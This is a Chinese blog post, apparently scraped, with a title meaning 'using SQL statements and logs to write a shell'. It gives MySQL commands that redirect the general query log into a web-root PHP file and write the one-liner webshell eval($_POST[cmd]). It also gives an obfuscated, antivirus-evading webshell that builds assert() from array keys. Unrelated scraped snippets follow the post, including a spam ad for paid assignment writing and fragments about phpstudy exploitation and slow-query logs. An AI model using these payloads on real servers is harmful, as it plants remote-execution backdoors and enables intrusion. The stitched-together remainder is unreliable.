SQL语句利用日志写shell

outfile被禁止,或者写入文件被拦截;

在数据库中操作如下:(必须是root权限)

show variables like ‘%general%‘;  #查看配置

set global general_log = on;  #开启general log模式

set global general_log_file = ‘/var/www/html/1.php‘;   #设置日志目录为shell地址

select ‘<?php eval($_POST[cmd]);?>‘  #写入shell

SQL查询免杀shell的语句

SELECT "<?php $p = array(‘f‘=>‘a‘,‘pffff‘=>‘s‘,‘e‘=>‘fffff‘,‘lfaaaa‘=>‘r‘,‘nnnnn‘=>‘t‘);$a = array_keys($p);$_=$p[‘pffff‘].$p[‘pffff‘].$a[2];$_= ‘a‘.$_.‘rt‘;$_(base64_decode($_REQUEST[‘username‘]));?>"

原文地址:https://www.cnblogs.com/hookjoy/p/8589509.html

时间: 2024-10-17 12:12:37

SQL语句利用日志写shell的相关文章

SQL 语句代编代写、DATA MANAGEMENT SYSTEMS代写代做

SQL 语句代编代写.DATA MANAGEMENT SYSTEMS代写代做DATA MANAGEMENT SYSTEMS DESIGN PROJECTPurpose of this projectAnalyze, design, implement, and document a database system application. You will use the methodology for database development learned in class. The sys

功能越多,表越多,sql语句越不好写

之前遇到的难题是:数据库的表结构已经确定,而且数据量很庞大.随着功能的增加,表也不但的增加,逻辑也越来越复杂,sql语句也就越来越难写.最后写不出来,就在想:是重新调整表结构还是把这部分功能撤掉? 解决办法是:多次利用form 和url参数传参数获取需要的其他表的内容. 主要也是一开始做这个项目的时候没做好详细的文档,下次做项目之前一定要先做文档.文档越详细越好.具体到数据库的标的字段:代码的功能,内容:界面的内容:文件的名字,变量的名字: 动手做项目的时候,也要一步步把目前要做那个功能模块,遇

(实战)phpstudy的漏洞+数据库日志写shell

--真正的才智是刚毅的志向. 今天没学多少东西,直到下午在看别人的文章的时候看到了phpstudy0day的关键词,好奇就查了查.其实这个洞有一段时间了,然后就准备google试试还能不能找到有洞的网站,直接google搜phpstudy 探针 2014.结果是这样的 ,我不得不感叹google太强了. 前几页我就不打算看了,基本上已经被日穿了,或者洞补了.所以干脆向后面翻,说实话运气很重要,我刚尝试了第一个网站就成了. 首先,点开网站是这样的: 我们要用到的就是这个MySQL数据库连接检测功能

MySQL5.6 如何优化慢查询的SQL语句 -- 慢日志介绍

最近有个开发团队抱怨我们平台包含的mysql cluster不行,总是报mysql的"heartbeat Error",分析了他们收集的日志,没有发现mysql cluster节点之间的网络有问题,倒是发现了一个很有意思的现象,在mysql的slow log里面发现了大量的慢查询,基本上都是要1秒钟以上,很明显这种耗时高的慢查询会影响系统行为,指出这点让开发团队去优化他们的应用,很好奇他们竟然不知道有这些东西可以分析...... 数据库响应慢问题最多的就是查询了.现在大部分数据库都提供

MySQL5.6 怎样优化慢查询的SQL语句 -- 慢日志介绍

近期有个开发团队抱怨我们平台包括的mysql cluster不行,总是报mysql的"heartbeat Error".分析了他们收集的日志.没有发现mysql cluster节点之间的网络有问题,倒是发现了一个非常有意思的现象,在mysql的slow log里面发现了大量的慢查询.基本上都是要1秒钟以上,非常明显这样的耗时高的慢查询会影响系统行为.指出这点让开发团队去优化他们的应用,非常好奇他们居然不知道有这些东西能够分析. ... .. 数据库响应慢问题最多的就是查询了.如今大部分

关于SQL语句条件值写中文查不到的问题

在使用jdbc链接MySQL执行SQL语句的时候,sql语句中的where条件,参数值带中文,则查询不到结果,而where条件,参数值都为数字或字母时可以正常查询, 原因是mysql的character_set_connection默认的设置不是utf8,我的解决办法,打开命令行提示符操作界面  登陆MySQL 执行 SET character_set_connection = utf8 ;命令,然后在数据库连接的url中要带字符设置  比如 jdbc:mysql://localhost:330

在同一个sql语句中如何写不同条件的count数量 (转)

select sum(case when (t.条件字段='00') then 1 else 0 end)"描述名称1", sum(case when (t.条件字段='01') then 1 else 0 end)"描述名称2" from 表名 t

mysql 通过慢查询日志查写得慢的sql语句

MySQL通过慢查询日志定位那些执行效率较低的SQL 语句,用--log-slow-queries[=file_name]选项启动时,mysqld 会写一个包含所有执行时间超过long_query_time 秒的SQL语句的日志文件,通过查看这个日志文件定位效率较低的SQL . 慢查询日志在查询结束以后才记录,所以在应用反映执行效率出现问题的时候查询慢查询日志并不能定位问题,可以使用show processlist命令查看当前MySQL在进行的线程,包括线程的状态.是否锁表等,可以实时地查看SQ

Shell脚本中执行sql语句操作

这篇文章主要介绍了Shell脚本中执行sql语句操作mysql的5种方法,本文讲解了将SQL语句直接嵌入到shell脚本文件中.命令行调用单独的SQL文件.使用管道符调用SQL文件等方法,需要的朋友可以参考下 对于自动化运维,诸如备份恢复之类的,DBA经常需要将SQL语句封装到shell脚本.本文描述了在Linux环境下mysql数据库中,shell脚本下调用sql语句的几种方法,供大家参考.对于脚本输出的结果美化,需要进一步完善和调整.以下为具体的示例及其方法. 1.将SQL语句直接嵌入到sh